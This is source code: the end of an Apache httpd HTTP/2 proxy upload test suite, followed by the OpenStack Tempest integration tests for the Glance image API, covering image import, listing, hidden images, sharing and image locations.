url = env.mkurl("https", "cgi", "/h2proxy/h2test/echo?chunk_delay=10ms")
r = env.curl_upload(url, fpath, options=[])
assert r.exit_code == 0
assert 200 <= r.response["status"] < 300
# we POST a form, so echoed input is larger than the file itself
assert len(r.response["body"]) > os.path.getsize(fpath)
@pytest.mark.parametrize("name", [
"data-1k", "data-10k", "data-100k", "data-1m",
])
def test_h2_601_03_echo_fail_early(self, env, name):
if not env.httpd_is_at_least('2.4.58'):
            pytest.skip('needs httpd 2.4.58')
fpath = os.path.join(env.gen_dir, name)
url = env.mkurl("https", "cgi", "/h2proxy/h2test/echo?fail_after=512")
r = env.curl_upload(url, fpath, options=[])
# 92 is curl's CURLE_HTTP2_STREAM
assert r.exit_code == 92 or r.response["status"] == 502
@pytest.mark.parametrize("name", [
"data-1k", "data-10k", "data-100k", "data-1m",
])
def test_h2_601_04_echo_fail_late(self, env, name):
if not env.httpd_is_at_least('2.4.58'):
            pytest.skip('needs httpd 2.4.58')
fpath = os.path.join(env.gen_dir, name)
url = env.mkurl("https", "cgi", f"/h2proxy/h2test/echo?fail_after={os.path.getsize(fpath)}")
r = env.curl_upload(url, fpath, options=[])
# 92 is curl's CURLE_HTTP2_STREAM
if r.exit_code != 0:
# H2 stream or partial file error
assert r.exit_code == 92 or r.exit_code == 18, f'{r}'
else:
assert r.response["status"] == 502, f'{r}'
def test_h2_601_05_echo_fail_many(self, env):
if not env.httpd_is_at_least('2.4.58'):
            pytest.skip('needs httpd 2.4.58')
if not env.curl_is_at_least('8.0.0'):
            pytest.skip('need at least curl v8.0.0 for this')
count = 200
fpath = os.path.join(env.gen_dir, "data-100k")
args = [env.curl, '--parallel', '--parallel-max', '20']
for i in range(count):
if i > 0:
args.append('--next')
url = env.mkurl("https", "cgi", f"/h2proxy/h2test/echo?id={i}&fail_after={os.path.getsize(fpath)}")
args.extend(env.curl_resolve_args(url=url))
args.extend([
'-o', '/dev/null', '-w', '%{json}\\n', '--form', f'file=@{fpath}', url
])
log.error(f'run: {args}')
r = env.run(args)
stats = []
for line in r.stdout.splitlines():
stats.append(json.loads(line))
assert len(stats) == count
for st in stats:
if st['exitcode'] != 0:
# H2 stream or partial file error
assert st['exitcode'] == 92 or st['exitcode'] == 18, f'{r}'
else:
assert st['http_code'] == 502, f'{r}'
|
dabd728ac22e8f258a09659a33cc2f1e1c198ac7
|
8f267fe1157904023004aa1fcee8cdcaf1d69f74
|
/tempest/api/image/v2/test_images.py
|
977ad82d95616c4a0aab195d8cc1cadc81767180
|
[
"Apache-2.0"
] |
permissive
|
openstack/tempest
|
a65737f3e62d4ebeb7e387feac7bcc636d3f5fe0
|
3932a799e620a20d7abf7b89e21b520683a1809b
|
refs/heads/master
| 2023-08-28T15:04:21.241805
| 2023-08-28T10:16:57
| 2023-08-28T10:16:57
| 2,356,406
| 270
| 407
|
Apache-2.0
| 2022-06-29T15:52:45
| 2011-09-09T15:56:02
|
Python
|
UTF-8
|
Python
| false
| false
| 43,927
|
py
|
test_images.py
|
# Copyright 2013 OpenStack Foundation
# Copyright 2013 IBM Corp
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import io
import random
from oslo_log import log as logging
from tempest.api.image import base
from tempest.common import waiters
from tempest import config
from tempest.lib.common.utils import data_utils
from tempest.lib.common.utils import test_utils
from tempest.lib import decorators
from tempest.lib import exceptions as lib_exc
CONF = config.CONF
LOG = logging.getLogger(__name__)
class ImportImagesTest(base.BaseV2ImageTest):
"""Here we test the import operations for image"""
@classmethod
def skip_checks(cls):
super(ImportImagesTest, cls).skip_checks()
if not CONF.image_feature_enabled.import_image:
skip_msg = (
"%s skipped as image import is not available" % cls.__name__)
raise cls.skipException(skip_msg)
@classmethod
def resource_setup(cls):
super(ImportImagesTest, cls).resource_setup()
cls.available_import_methods = cls.client.info_import()[
'import-methods']['value']
if not cls.available_import_methods:
raise cls.skipException('Server does not support '
'any import method')
def _create_image(self, disk_format=None, container_format=None):
# Create image
uuid = '00000000-1111-2222-3333-444455556666'
image_name = data_utils.rand_name('image')
container_format = container_format or CONF.image.container_formats[0]
disk_format = disk_format or CONF.image.disk_formats[0]
image = self.create_image(name=image_name,
container_format=container_format,
disk_format=disk_format,
visibility='private',
ramdisk_id=uuid)
self.assertIn('name', image)
self.assertEqual(image_name, image['name'])
self.assertIn('visibility', image)
self.assertEqual('private', image['visibility'])
self.assertIn('status', image)
self.assertEqual('queued', image['status'])
return image
def _require_import_method(self, method):
if method not in self.available_import_methods:
raise self.skipException('Server does not support '
'%s import method' % method)
def _stage_and_check(self):
image = self._create_image()
# Stage image data
file_content = data_utils.random_bytes()
image_file = io.BytesIO(file_content)
self.client.stage_image_file(image['id'], image_file)
# Check image status is 'uploading'
body = self.client.show_image(image['id'])
self.assertEqual(image['id'], body['id'])
self.assertEqual('uploading', body['status'])
return image['id']
@decorators.idempotent_id('32ca0c20-e16f-44ac-8590-07869c9b4cc2')
def test_image_glance_direct_import(self):
"""Test 'glance-direct' import functionalities
Create image, stage image data, import image and verify
that import succeeded.
"""
self._require_import_method('glance-direct')
image_id = self._stage_and_check()
# import image from staging to backend
resp = self.client.image_import(image_id, method='glance-direct')
waiters.wait_for_image_imported_to_stores(self.client, image_id)
if not self.versions_client.has_version('2.12'):
# API is not new enough to support image/tasks API
LOG.info('Glance does not support v2.12, so I am unable to '
'validate the image/tasks API.')
return
tasks = waiters.wait_for_image_tasks_status(
self.client, image_id, 'success')
self.assertEqual(1, len(tasks))
task = tasks[0]
self.assertEqual(resp.response['x-openstack-request-id'],
task['request_id'])
self.assertEqual('glance-direct',
task['input']['import_req']['method']['name'])
@decorators.idempotent_id('f6feb7a4-b04f-4706-a011-206129f83e62')
def test_image_web_download_import(self):
"""Test 'web-download' import functionalities
Create image, import image and verify that import
succeeded.
"""
self._require_import_method('web-download')
image = self._create_image()
# Now try to get image details
body = self.client.show_image(image['id'])
self.assertEqual(image['id'], body['id'])
self.assertEqual('queued', body['status'])
# import image from web to backend
image_uri = CONF.image.http_image
self.client.image_import(image['id'], method='web-download',
import_params={'uri': image_uri})
waiters.wait_for_image_imported_to_stores(self.client, image['id'])
@decorators.idempotent_id('8876c818-c40e-4b90-9742-31d231616305')
def test_image_glance_download_import_success(self):
# We use glance-direct initially, then glance-download for test
self._require_import_method('glance-direct')
self._require_import_method('glance-download')
# Create an image via the normal import process to be our source
src = self._stage_and_check()
self.client.image_import(src, method='glance-direct')
waiters.wait_for_image_imported_to_stores(self.client, src)
# Add some properties to it that will be copied by the default
# config (and one that won't)
self.client.update_image(src, [
{'add': '/hw_cpu_cores', 'value': '5'},
{'add': '/trait:STORAGE_DISK_SSD', 'value': 'required'},
{'add': '/os_distro', 'value': 'rhel'},
{'add': '/speed', 'value': '88mph'},
])
# Make sure our properties stuck on the source image
src_image = self.client.show_image(src)
self.assertEqual('5', src_image['hw_cpu_cores'])
self.assertEqual('required', src_image['trait:STORAGE_DISK_SSD'])
self.assertEqual('rhel', src_image['os_distro'])
self.assertEqual('88mph', src_image['speed'])
# Create a new image which we will fill from another glance image
dst = self._create_image(container_format='ovf',
disk_format='iso')['id']
# Set some values that will conflict to make sure we get the
# new ones and confirm they stuck before the import.
self.client.update_image(dst, [
{'add': '/hw_cpu_cores', 'value': '1'},
{'add': '/os_distro', 'value': 'windows'},
])
dst_image = self.client.show_image(dst)
self.assertEqual('1', dst_image['hw_cpu_cores'])
self.assertEqual('windows', dst_image['os_distro'])
params = {
'glance_image_id': src,
'glance_region': self.client.region,
'glance_service_interface': 'public',
}
self.client.image_import(dst, method='glance-download',
import_params=params)
waiters.wait_for_image_tasks_status(self.client, dst, 'success')
# Make sure the new image has all the keys imported from the
# original image that we expect
dst_image = self.client.show_image(dst)
self.assertEqual(src_image['disk_format'], dst_image['disk_format'])
self.assertEqual(src_image['container_format'],
dst_image['container_format'])
self.assertEqual('5', dst_image['hw_cpu_cores'])
self.assertEqual('required', dst_image['trait:STORAGE_DISK_SSD'])
self.assertEqual('rhel', dst_image['os_distro'])
self.assertNotIn('speed', dst_image)
@decorators.attr(type=['negative'])
@decorators.idempotent_id('36d4b546-64a2-4bb9-bdd0-ba676aa48f2c')
def test_image_glance_download_import_bad_uuid(self):
self._require_import_method('glance-download')
image_id = self._create_image()['id']
params = {
'glance_image_id': 'foo',
'glance_region': self.client.region,
'glance_service_interface': 'public',
}
# A non-UUID-like image id should make us fail immediately
e = self.assertRaises(lib_exc.BadRequest,
self.client.image_import,
image_id, method='glance-download',
import_params=params)
self.assertIn('image id does not look like a UUID', str(e))
@decorators.attr(type=['negative'])
@decorators.idempotent_id('77644240-dbbe-4744-ae28-09b2ac12e218')
def test_image_glance_download_import_bad_endpoint(self):
self._require_import_method('glance-download')
image_id = self._create_image()['id']
# Set some properties before the import to make sure they are
# undisturbed
self.client.update_image(image_id, [
{'add': '/hw_cpu_cores', 'value': '1'},
{'add': '/os_distro', 'value': 'windows'},
])
image = self.client.show_image(image_id)
self.assertEqual('1', image['hw_cpu_cores'])
self.assertEqual('windows', image['os_distro'])
params = {
'glance_image_id': '36d4b546-64a2-4bb9-bdd0-ba676aa48f2c',
'glance_region': 'not a region',
'glance_service_interface': 'not an interface',
}
# A bad region or interface will cause us to fail when we
# contact the remote glance.
self.client.image_import(image_id, method='glance-download',
import_params=params)
waiters.wait_for_image_tasks_status(self.client, image_id, 'failure')
# Make sure we reverted the image status to queued on failure, and that
# our extra properties are still in place.
image = self.client.show_image(image_id)
self.assertEqual('queued', image['status'])
self.assertEqual('1', image['hw_cpu_cores'])
self.assertEqual('windows', image['os_distro'])
@decorators.attr(type=['negative'])
@decorators.idempotent_id('c7edec8e-24b5-416a-9d42-b3e773bab62c')
def test_image_glance_download_import_bad_missing_image(self):
self._require_import_method('glance-download')
image_id = self._create_image()['id']
params = {
'glance_image_id': '36d4b546-64a2-4bb9-bdd0-ba676aa48f2c',
'glance_region': self.client.region,
'glance_service_interface': 'public',
}
# A non-existent image will cause us to fail when we
# contact the remote glance.
self.client.image_import(image_id, method='glance-download',
import_params=params)
waiters.wait_for_image_tasks_status(self.client, image_id, 'failure')
# Make sure we reverted the image status to queued on failure
image = self.client.show_image(image_id)
self.assertEqual('queued', image['status'])
@decorators.idempotent_id('e04761a1-22af-42c2-b8bc-a34a3f12b585')
def test_remote_import(self):
"""Test image import against a different worker than stage.
This creates and stages an image against the primary API worker,
but then calls import on a secondary worker (if available) to
test that distributed image import works (i.e. proxies the import
request to the proper worker).
"""
self._require_import_method('glance-direct')
if not CONF.image.alternate_image_endpoint:
raise self.skipException('No image_remote service to test '
'against')
image_id = self._stage_and_check()
# import image from staging to backend, but on the alternate worker
self.os_primary.image_client_remote.image_import(
image_id, method='glance-direct')
waiters.wait_for_image_imported_to_stores(self.client, image_id)
@decorators.idempotent_id('44d60544-1524-42f7-8899-315301105dd8')
def test_remote_delete(self):
"""Test image delete against a different worker than stage.
This creates and stages an image against the primary API worker,
but then calls delete on a secondary worker (if available) to
test that distributed image import works (i.e. proxies the delete
request to the proper worker).
"""
self._require_import_method('glance-direct')
if not CONF.image.alternate_image_endpoint:
raise self.skipException('No image_remote service to test '
'against')
image_id = self._stage_and_check()
        # delete the image, but via the alternate worker
self.os_primary.image_client_remote.delete_image(image_id)
self.client.wait_for_resource_deletion(image_id)
class MultiStoresImportImagesTest(base.BaseV2ImageTest):
"""Test importing image in multiple stores"""
@classmethod
def skip_checks(cls):
super(MultiStoresImportImagesTest, cls).skip_checks()
if not CONF.image_feature_enabled.import_image:
skip_msg = (
"%s skipped as image import is not available" % cls.__name__)
raise cls.skipException(skip_msg)
@classmethod
def resource_setup(cls):
super(MultiStoresImportImagesTest, cls).resource_setup()
cls.available_import_methods = cls.client.info_import()[
'import-methods']['value']
if not cls.available_import_methods:
raise cls.skipException('Server does not support '
'any import method')
        # NOTE(pdeore): Skip if the glance-direct import method and multistore
        # support are not enabled/configured, or if only one store is
        # configured in a multiple-stores setup.
cls.available_stores = cls.get_available_stores()
if ('glance-direct' not in cls.available_import_methods or
not len(cls.available_stores) > 1):
            raise cls.skipException(
                'Either the glance-direct import method is not present in '
                '%s, or at most one store is configured: %s' % (
                    cls.available_import_methods, cls.available_stores))
def _create_and_stage_image(self, all_stores=False):
"""Create Image & stage image file for glance-direct import method."""
image_name = data_utils.rand_name('test-image')
container_format = CONF.image.container_formats[0]
disk_format = CONF.image.disk_formats[0]
image = self.create_image(name=image_name,
container_format=container_format,
disk_format=disk_format,
visibility='private')
self.assertEqual('queued', image['status'])
self.client.stage_image_file(
image['id'],
io.BytesIO(data_utils.random_bytes()))
# Check image status is 'uploading'
body = self.client.show_image(image['id'])
self.assertEqual(image['id'], body['id'])
self.assertEqual('uploading', body['status'])
if all_stores:
stores_list = ','.join([store['id']
for store in self.available_stores
if store.get('read-only') != 'true'])
else:
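            # A step of len(stores) - 1 selects just the first and last
            # writable stores; max(1, ...) guards the single-store case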
stores = [store['id'] for store in self.available_stores
if store.get('read-only') != 'true']
stores_list = stores[::max(1, len(stores) - 1)]
return body, stores_list
@decorators.idempotent_id('bf04ff00-3182-47cb-833a-f1c6767b47fd')
def test_glance_direct_import_image_to_all_stores(self):
"""Test image is imported in all available stores
Create image, import image to all available stores using glance-direct
import method and verify that import succeeded.
"""
image, stores = self._create_and_stage_image(all_stores=True)
self.client.image_import(
image['id'], method='glance-direct', all_stores=True)
waiters.wait_for_image_imported_to_stores(self.client,
image['id'], stores)
@decorators.idempotent_id('82fb131a-dd2b-11ea-aec7-340286b6c574')
def test_glance_direct_import_image_to_specific_stores(self):
"""Test image is imported in all available stores
Create image, import image to specified store(s) using glance-direct
import method and verify that import succeeded.
"""
image, stores = self._create_and_stage_image()
self.client.image_import(image['id'], method='glance-direct',
stores=stores)
waiters.wait_for_image_imported_to_stores(self.client, image['id'],
(','.join(stores)))
class BasicOperationsImagesTest(base.BaseV2ImageTest):
"""Here we test the basic operations of images"""
@decorators.attr(type='smoke')
@decorators.idempotent_id('139b765e-7f3d-4b3d-8b37-3ca3876ee318')
def test_register_upload_get_image_file(self):
"""Here we test these functionalities
Register image, upload the image file, get image and get image
file api's
"""
uuid = '00000000-1111-2222-3333-444455556666'
image_name = data_utils.rand_name('image')
container_format = CONF.image.container_formats[0]
disk_format = CONF.image.disk_formats[0]
image = self.create_image(name=image_name,
container_format=container_format,
disk_format=disk_format,
visibility='private',
ramdisk_id=uuid)
self.assertIn('name', image)
self.assertEqual(image_name, image['name'])
self.assertIn('visibility', image)
self.assertEqual('private', image['visibility'])
self.assertIn('status', image)
self.assertEqual('queued', image['status'])
        # NOTE: This Glance API returns different status codes depending on
        # the image's condition. In this empty-data case, Glance should
        # return 204, so we check the status code here.
image_file = self.client.show_image_file(image['id'])
self.assertEqual(0, len(image_file.data))
self.assertEqual(204, image_file.response.status)
# Now try uploading an image file
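        # NOTE: random_bytes() defaults to 1024 bytes; the size assertion
        # below relies on that default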
file_content = data_utils.random_bytes()
image_file = io.BytesIO(file_content)
self.client.store_image_file(image['id'], image_file)
# Now try to get image details
body = self.client.show_image(image['id'])
self.assertEqual(image['id'], body['id'])
self.assertEqual(image_name, body['name'])
self.assertEqual(uuid, body['ramdisk_id'])
self.assertIn('size', body)
self.assertEqual(1024, body.get('size'))
# Now try get image file
        # NOTE: This Glance API returns different status codes depending on
        # the image's condition. In this non-empty-data case, Glance should
        # return 200, so we check the status code here.
body = self.client.show_image_file(image['id'])
self.assertEqual(file_content, body.data)
self.assertEqual(200, body.response.status)
@decorators.attr(type='smoke')
@decorators.idempotent_id('f848bb94-1c6e-45a4-8726-39e3a5b23535')
def test_delete_image(self):
"""Test deleting an image by image_id"""
# Create image
image_name = data_utils.rand_name('image')
container_format = CONF.image.container_formats[0]
disk_format = CONF.image.disk_formats[0]
image = self.create_image(name=image_name,
container_format=container_format,
disk_format=disk_format,
visibility='private')
# Delete Image
self.client.delete_image(image['id'])
self.client.wait_for_resource_deletion(image['id'])
# Verifying deletion
images = self.client.list_images()['images']
images_id = [item['id'] for item in images]
self.assertNotIn(image['id'], images_id)
@decorators.attr(type='smoke')
@decorators.idempotent_id('f66891a7-a35c-41a8-b590-a065c2a1caa6')
def test_update_image(self):
"""Test updating an image by image_id"""
# Create image
image_name = data_utils.rand_name('image')
container_format = CONF.image.container_formats[0]
disk_format = CONF.image.disk_formats[0]
image = self.create_image(name=image_name,
container_format=container_format,
disk_format=disk_format,
visibility='private')
self.assertEqual('queued', image['status'])
# Update Image
new_image_name = data_utils.rand_name('new-image')
self.client.update_image(image['id'], [
dict(replace='/name', value=new_image_name)])
# Verifying updating
body = self.client.show_image(image['id'])
self.assertEqual(image['id'], body['id'])
self.assertEqual(new_image_name, body['name'])
@decorators.idempotent_id('951ebe01-969f-4ea9-9898-8a3f1f442ab0')
def test_deactivate_reactivate_image(self):
"""Test deactivating and reactivating an image"""
# Create image
image_name = data_utils.rand_name('image')
image = self.create_image(name=image_name,
container_format='bare',
disk_format='raw',
visibility='private')
# Upload an image file
content = data_utils.random_bytes()
image_file = io.BytesIO(content)
self.client.store_image_file(image['id'], image_file)
# Deactivate image
self.client.deactivate_image(image['id'])
body = self.client.show_image(image['id'])
self.assertEqual("deactivated", body['status'])
# User unable to download deactivated image
self.assertRaises(lib_exc.Forbidden, self.client.show_image_file,
image['id'])
# Reactivate image
self.client.reactivate_image(image['id'])
body = self.client.show_image(image['id'])
self.assertEqual("active", body['status'])
# User able to download image after reactivation
body = self.client.show_image_file(image['id'])
self.assertEqual(content, body.data)
class ListUserImagesTest(base.BaseV2ImageTest):
"""Here we test the listing of image information"""
@classmethod
def resource_setup(cls):
super(ListUserImagesTest, cls).resource_setup()
# We add a few images here to test the listing functionality of
# the images API
container_fmts = CONF.image.container_formats
disk_fmts = CONF.image.disk_formats
all_pairs = [(container_fmt, disk_fmt)
for container_fmt in container_fmts
for disk_fmt in disk_fmts]
for (container_fmt, disk_fmt) in all_pairs[:6]:
LOG.debug("Creating an image "
"(Container format: %s, Disk format: %s).",
container_fmt, disk_fmt)
cls._create_standard_image(container_fmt, disk_fmt)
@classmethod
def _create_standard_image(cls, container_format, disk_format):
"""Create a new standard image and return the newly-registered image-id
Note that the size of the new image is a random number between
1024 and 4096
"""
size = random.randint(1024, 4096)
image_file = io.BytesIO(data_utils.random_bytes(size))
tags = [data_utils.rand_name('tag'), data_utils.rand_name('tag')]
image = cls.create_image(container_format=container_format,
disk_format=disk_format,
visibility='private',
tags=tags)
cls.client.store_image_file(image['id'], data=image_file)
# Keep the data of one test image so it can be used to filter lists
cls.test_data = image
return image['id']
def _list_by_param_value_and_assert(self, params):
"""Perform list action with given params and validates result."""
# Retrieve the list of images that meet the filter
images_list = self.client.list_images(params=params)['images']
# Validating params of fetched images
msg = 'No images were found that met the filter criteria.'
self.assertNotEmpty(images_list, msg)
for image in images_list:
for key in params:
msg = "Failed to list images by %s" % key
self.assertEqual(params[key], image[key], msg)
def _list_sorted_by_image_size_and_assert(self, params, desc=False):
"""Validate an image list that has been sorted by size
Perform list action with given params and validates the results are
sorted by image size in either ascending or descending order.
"""
# Retrieve the list of images that meet the filter
images_list = self.client.list_images(params=params)['images']
# Validate that the list was fetched sorted accordingly
msg = 'No images were found that met the filter criteria.'
self.assertNotEmpty(images_list, msg)
sorted_list = [image['size'] for image in images_list
if image['size'] is not None]
msg = 'The list of images was not sorted correctly.'
self.assertEqual(sorted(sorted_list, reverse=desc), sorted_list, msg)
@decorators.idempotent_id('1e341d7a-90a9-494c-b143-2cdf2aeb6aee')
def test_list_no_params(self):
"""Simple test to see all fixture images returned"""
images_list = self.client.list_images()['images']
image_list = [image['id'] for image in images_list]
for image in self.created_images:
self.assertIn(image, image_list)
@decorators.idempotent_id('9959ca1d-1aa7-4b7a-a1ea-0fff0499b37e')
def test_list_images_param_container_format(self):
"""Test to get all images with a specific container_format"""
params = {"container_format": self.test_data['container_format']}
self._list_by_param_value_and_assert(params)
@decorators.idempotent_id('4a4735a7-f22f-49b6-b0d9-66e1ef7453eb')
def test_list_images_param_disk_format(self):
"""Test to get all images with disk_format = raw"""
params = {"disk_format": "raw"}
self._list_by_param_value_and_assert(params)
@decorators.idempotent_id('7a95bb92-d99e-4b12-9718-7bc6ab73e6d2')
def test_list_images_param_visibility(self):
"""Test to get all images with visibility = private"""
params = {"visibility": "private"}
self._list_by_param_value_and_assert(params)
@decorators.idempotent_id('cf1b9a48-8340-480e-af7b-fe7e17690876')
def test_list_images_param_size(self):
"""Test to get all images by size"""
image_id = self.created_images[0]
# Get image metadata
image = self.client.show_image(image_id)
params = {"size": image['size']}
self._list_by_param_value_and_assert(params)
@decorators.idempotent_id('4ad8c157-971a-4ba8-aa84-ed61154b1e7f')
def test_list_images_param_min_max_size(self):
"""Test to get all images with min size and max size"""
image_id = self.created_images[0]
# Get image metadata
image = self.client.show_image(image_id)
size = image['size']
params = {"size_min": size - 500, "size_max": size + 500}
images_list = self.client.list_images(params=params)['images']
image_size_list = map(lambda x: x['size'], images_list)
for image_size in image_size_list:
self.assertGreaterEqual(image_size, params['size_min'],
"Failed to get images by size_min")
self.assertLessEqual(image_size, params['size_max'],
"Failed to get images by size_max")
@decorators.idempotent_id('7fc9e369-0f58-4d05-9aa5-0969e2d59d15')
def test_list_images_param_status(self):
"""Test to get all active images"""
params = {"status": "active"}
self._list_by_param_value_and_assert(params)
@decorators.idempotent_id('e914a891-3cc8-4b40-ad32-e0a39ffbddbb')
def test_list_images_param_limit(self):
"""Test to get images by limit"""
params = {"limit": 1}
images_list = self.client.list_images(params=params)['images']
self.assertEqual(len(images_list), params['limit'],
"Failed to get images by limit")
@decorators.idempotent_id('e9a44b91-31c8-4b40-a332-e0a39ffb4dbb')
def test_list_image_param_owner(self):
"""Test to get images by owner"""
image_id = self.created_images[0]
# Get image metadata
image = self.client.show_image(image_id)
params = {"owner": image['owner']}
self._list_by_param_value_and_assert(params)
@decorators.idempotent_id('55c8f5f5-bfed-409d-a6d5-4caeda985d7b')
def test_list_images_param_name(self):
"""Test to get images by name"""
params = {'name': self.test_data['name']}
self._list_by_param_value_and_assert(params)
@decorators.idempotent_id('aa8ac4df-cff9-418b-8d0f-dd9c67b072c9')
def test_list_images_param_tag(self):
"""Test to get images matching a tag"""
params = {'tag': self.test_data['tags'][0]}
images_list = self.client.list_images(params=params)['images']
# Validating properties of fetched images
self.assertNotEmpty(images_list)
for image in images_list:
msg = ("The image {image_name} does not have the expected tag "
"{expected_tag} among its tags: {observerd_tags}."
.format(image_name=image['name'],
expected_tag=self.test_data['tags'][0],
observerd_tags=image['tags']))
self.assertIn(self.test_data['tags'][0], image['tags'], msg)
@decorators.idempotent_id('eeadce49-04e0-43b7-aec7-52535d903e7a')
def test_list_images_param_sort(self):
"""Test listing images sorting in descending order"""
params = {'sort': 'size:desc'}
self._list_sorted_by_image_size_and_assert(params, desc=True)
@decorators.idempotent_id('9faaa0c2-c3a5-43e1-8f61-61c54b409a49')
def test_list_images_param_sort_key_dir(self):
"""Test listing images sorting by size in descending order"""
params = {'sort_key': 'size', 'sort_dir': 'desc'}
self._list_sorted_by_image_size_and_assert(params, desc=True)
@decorators.idempotent_id('622b925c-479f-4736-860d-adeaf13bc371')
def test_get_image_schema(self):
"""Test to get image schema"""
schema = "image"
body = self.schemas_client.show_schema(schema)
self.assertEqual("image", body['name'])
@decorators.idempotent_id('25c8d7b2-df21-460f-87ac-93130bcdc684')
def test_get_images_schema(self):
"""Test to get images schema"""
schema = "images"
body = self.schemas_client.show_schema(schema)
self.assertEqual("images", body['name'])
@decorators.idempotent_id('d43f3efc-da4c-4af9-b636-868f0c6acedb')
def test_list_hidden_image(self):
image = self.client.create_image(os_hidden=True)
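        # Some client versions wrap the response body in an 'image' key;
        # unwrap it if present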
image = image['image'] if 'image' in image else image
self.addCleanup(self.client.wait_for_resource_deletion, image['id'])
self.addCleanup(test_utils.call_and_ignore_notfound_exc,
self.client.delete_image, image['id'])
images_list = self.client.list_images()['images']
fetched_images_id = [img['id'] for img in images_list]
self.assertNotIn(image['id'], fetched_images_id)
@decorators.idempotent_id('fdb96b81-257b-42ac-978b-ddeefa3760e4')
def test_list_update_hidden_image(self):
image = self.create_image()
images_list = self.client.list_images()['images']
fetched_images_id = [img['id'] for img in images_list]
self.assertIn(image['id'], fetched_images_id)
self.client.update_image(image['id'],
[dict(replace='/os_hidden', value=True)])
images_list = self.client.list_images()['images']
fetched_images_id = [img['id'] for img in images_list]
self.assertNotIn(image['id'], fetched_images_id)
class ListSharedImagesTest(base.BaseV2ImageTest):
"""Here we test the listing of a shared image information"""
credentials = ['primary', 'alt']
@classmethod
def setup_clients(cls):
super(ListSharedImagesTest, cls).setup_clients()
cls.image_member_client = cls.os_primary.image_member_client_v2
cls.alt_img_client = cls.os_alt.image_client_v2
@decorators.idempotent_id('3fa50be4-8e38-4c02-a8db-7811bb780122')
def test_list_images_param_member_status(self):
"""Test listing images by member_status and visibility"""
# Create an image to be shared using default visibility
image_file = io.BytesIO(data_utils.random_bytes(2048))
container_format = CONF.image.container_formats[0]
disk_format = CONF.image.disk_formats[0]
image = self.create_image(container_format=container_format,
disk_format=disk_format)
self.client.store_image_file(image['id'], data=image_file)
# Share the image created with the alt user
self.image_member_client.create_image_member(
image_id=image['id'], member=self.alt_img_client.tenant_id)
# As an image consumer you need to provide the member_status parameter
# along with the visibility=shared parameter in order for it to show
# results
params = {'member_status': 'pending', 'visibility': 'shared'}
fetched_images = self.alt_img_client.list_images(params)['images']
self.assertEqual(1, len(fetched_images))
self.assertEqual(image['id'], fetched_images[0]['id'])
class ImageLocationsTest(base.BaseV2ImageTest):
@classmethod
def skip_checks(cls):
super(ImageLocationsTest, cls).skip_checks()
if not CONF.image_feature_enabled.manage_locations:
skip_msg = (
"%s skipped as show_multiple_locations is not available" % (
cls.__name__))
raise cls.skipException(skip_msg)
@decorators.idempotent_id('58b0fadc-219d-40e1-b159-1c902cec323a')
def test_location_after_upload(self):
image = self.client.create_image(container_format='bare',
disk_format='raw')
# Locations should be empty when there is no data
self.assertEqual('queued', image['status'])
self.assertEqual([], image['locations'])
# Now try uploading an image file
file_content = data_utils.random_bytes()
image_file = io.BytesIO(file_content)
self.client.store_image_file(image['id'], image_file)
waiters.wait_for_image_status(self.client, image['id'], 'active')
# Locations should now have one item
image = self.client.show_image(image['id'])
self.assertEqual(1, len(image['locations']),
'Expected one location in %r' % image['locations'])
# NOTE(danms): If show_image_direct_url is enabled, then this
# will be present. If so, it should match the one location we set
if 'direct_url' in image:
self.assertEqual(image['direct_url'], image['locations'][0]['url'])
return image
@decorators.idempotent_id('37599b8a-d5c0-4590-aee5-73878502be15')
def test_set_location(self):
self.check_set_location()
@decorators.idempotent_id('bf6e0009-c039-4884-b498-db074caadb10')
def test_replace_location(self):
image = self.check_set_multiple_locations()
original_locs = image['locations']
# Replacing with the exact thing should work
self.client.update_image(image['id'], [
dict(replace='/locations', value=image['locations'])])
# Changing metadata on a location should work
original_locs[0]['metadata']['date'] = '2015-10-15'
self.client.update_image(image['id'], [
dict(replace='/locations', value=original_locs)])
# Deleting a location should not work
self.assertRaises(
lib_exc.BadRequest,
self.client.update_image,
image['id'], [
dict(replace='/locations', value=[original_locs[0]])])
# Replacing a location (with a different URL) should not work
new_loc = {'metadata': original_locs[1]['metadata'],
'url': '%s#new3' % CONF.image.http_image}
self.assertRaises(
lib_exc.BadRequest,
self.client.update_image,
image['id'], [
dict(replace='/locations', value=[original_locs[0],
new_loc])])
# Make sure the locations haven't changed with the above failures,
# but the metadata we updated should be changed.
image = self.client.show_image(image['id'])
self.assertEqual(2, len(image['locations']),
'Image should have two locations but has %i' % (
len(image['locations'])))
self.assertEqual(original_locs, image['locations'])
@decorators.idempotent_id('a9a20396-8399-4b36-909d-564949be098f')
def test_set_location_bad_scheme(self):
image = self.client.create_image(container_format='bare',
disk_format='raw')
# Locations should be empty when there is no data
self.assertEqual('queued', image['status'])
self.assertEqual([], image['locations'])
# Adding a new location using a scheme that is not allowed
# should result in an error
new_loc = {'metadata': {'foo': 'bar'},
'url': 'gopher://info.cern.ch'}
self.assertRaises(lib_exc.BadRequest,
self.client.update_image, image['id'], [
dict(add='/locations/-', value=new_loc)])
def _check_set_location_with_hash(self):
image = self.client.create_image(container_format='bare',
disk_format='raw')
# Create a new location with validation data
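        # '1' * 32 has the length of an md5 checksum and 'deadbeef' * 16
        # the length of a sha512 hex digest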
new_loc = {'validation_data': {'checksum': '1' * 32,
'os_hash_value': 'deadbeef' * 16,
'os_hash_algo': 'sha512'},
'metadata': {},
'url': CONF.image.http_image}
self._update_image_with_retries(image['id'],
[dict(add='/locations/-',
value=new_loc)])
# Expect that all of our values ended up on the image
image = self.client.show_image(image['id'])
self.assertEqual(1, len(image['locations']))
self.assertEqual('1' * 32, image['checksum'])
self.assertEqual('deadbeef' * 16, image['os_hash_value'])
self.assertEqual('sha512', image['os_hash_algo'])
self.assertNotIn('validation_data', image['locations'][0])
self.assertEqual('active', image['status'])
return image
@decorators.idempotent_id('42d6f7db-c9f5-4bae-9e15-a90262fe445a')
def test_set_location_with_hash(self):
self._check_set_location_with_hash()
@decorators.idempotent_id('304c8a19-aa86-47dd-a022-ec4c7f433f1b')
def test_set_location_with_hash_second_matching(self):
orig_image = self._check_set_location_with_hash()
new_loc = {
'validation_data': {'checksum': orig_image['checksum'],
'os_hash_value': orig_image['os_hash_value'],
